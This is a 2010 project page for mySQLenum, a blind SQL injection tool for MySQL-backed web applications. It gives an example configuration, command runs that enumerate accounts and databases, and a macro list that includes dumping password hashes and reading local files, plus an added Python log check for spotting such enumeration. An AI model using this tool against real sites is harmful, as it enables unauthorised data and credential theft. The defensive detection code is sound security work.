MySQLenum

Automatic blind SQL injection tool.

Posted by Andrea Fabrizi on October 15, 2010

mySQLenum is a command-line tool that automates blind SQL injection against web applications that use a MySQL server as their back-end database.

It’s written in pure C, has no dependencies, is fast, and supports all recent MySQL versions.

The enumeration algorithm was designed to reduce the number of requests and limit bandwidth usage.

Note that this project was only an experiment and it’s not maintained anymore.

The following is an example mysqlenum.conf file:

#Server host
host = www.example.com

#Server port
port = 80

#Vulnerable page
page = /index.php

#HTTP method
#GET or POST (Default is GET)
httpmethod = GET

#Vulnerable parameter, including the default value
#Example: vulnparam = id=9
#         vulnparam = name=hello'
#         vulnparam = code=ABC"
vulnparam = page_id=2

#String to match in the page when the query is valid (TRUE)
matchstring = Hello

#SQL query to execute
sqlquery = select user from accounts

…more options available

Operating modes

mySQLenum works in two ways:

  • Standard mode
  • Macro mode

Standard mode

In this mode, mySQLenum enumerates the results of a custom query, specified in the configuration file or with the command-line option --sql-query.

$ ./mysqlenum --sql-query="select user from accounts"
mySQLenum 0.3
Copyright (C) 2009-2010 Andrea Fabrizi 

 Query: select user from accounts

 1)  admin 
 2)  local 
 3)  marco 
 4)  luca 
 5)  ---

 > Total requests: 192
 > Data sent: 63 Kb
 > Data received: 675 Kb

Macro mode

In Macro mode, mySQLenum automatically enumerates predefined queries. The information_schema database must be accessible to run macros 1, 2 and 3.

$ ./mysqlenum -m
mySQLenum 0.3
Copyright (C) 2009-2010 Andrea Fabrizi 

  Available macros:
    0) Test enumeration
    1) Databases enumeration
    2) Tables enumeration
    3) Fields enumeration
    4) MySQL Version
    5) Current User
    6) Current Database
    7) MySQL Users and password hashes
    8) View local file
    9) Data directory

  Your choice: 1

Databases:
 1)  information_schema 
 2)  security 
 3)  mysql 
 4)  phpmyadmin 
 5)  ---

 > Total requests: 361
 > Data sent: 136 Kb
 > Data received: 1275 Kb
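
From the defender's side, the request totals in the two runs above (192 and 361 requests against one page and one parameter) are the most visible trace of this kind of enumeration. The following is an added example, not part of mySQLenum or the original post: a Python check over web access-log lines that flags a client sending many distinct, non-integer values for one parameter. The log lines, thresholds and function names are constructed assumptions, the parameter is assumed to normally hold an integer ID (as in page_id=2), and the payload text is a placeholder because the page does not show the tool's request format.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Combined-log-format prefix: client ident user [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def parse_line(line):
    """Return (client, path, [(param, value), ...]) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, target, _status = m.groups()
    url = urlsplit(target)
    return client, url.path, parse_qsl(url.query, keep_blank_values=True)

def find_enumeration(lines, min_distinct=20, min_odd_ratio=0.9):
    """Flag (client, path, param) groups with many distinct non-integer values.

    Thresholds are assumptions for this example; tune them on real traffic.
    """
    seen = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, path, params = parsed
        for name, value in params:
            seen[(client, path, name)].add(value)
    findings = []
    for (client, path, name), values in seen.items():
        odd = sum(1 for v in values if not v.isdigit())
        if len(values) >= min_distinct and odd / len(values) >= min_odd_ratio:
            findings.append({"client": client, "path": path, "param": name,
                             "distinct_values": len(values)})
    return sorted(findings, key=lambda f: -f["distinct_values"])

def sample_log():
    """Constructed log lines: one ordinary visitor and one noisy client."""
    fmt = '{ip} - - [15/Oct/2010:10:00:{s:02d} +0000] "GET /index.php?page_id={v} HTTP/1.1" 200 512'
    normal = [fmt.format(ip="198.51.100.7", s=i, v=i + 1) for i in range(5)]
    # Placeholder values only: the real request format is not shown on the page.
    noisy = [fmt.format(ip="203.0.113.9", s=i % 60, v=f"2%20PLACEHOLDER_{i}")
             for i in range(192)]
    return normal + noisy

if __name__ == "__main__":
    for finding in find_enumeration(sample_log()):
        print(finding)
```

With httpmethod = POST the parameter travels in the request body, which standard access logs do not record, so the same grouping has to run over WAF or application logs instead.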

Help

$ ./mysqlenum -h
mySQLenum 0.3
 usage: ./mysqlenum [OPTION...]

 OPTIONS:
   -c,   --config		 config file (default is mysqlenum.conf).
   -q,   --sql-query		 SQL Query to execute.
   -r,   --start-row		 starts the enumeration from this row (default is the  first row).
   -m,   --macro		 start macro mode.

         --no-spinner		 disable the spinner.
         --quiet		 quiet (no output).
   -h,   --help			 this help.
   -V,   --version		 display the version and exit.
   -v,   --verbose		 be verbose (-vvv for very verbose).

Changelog version 0.3:

  • Removed command line parameters
  • Added configuration file support
  • Added 7 new macros!
  • Inverse match support
  • Many new features!
  • Code cleanup

Download:

Source tarball mysqlenum-0.3.tar.gz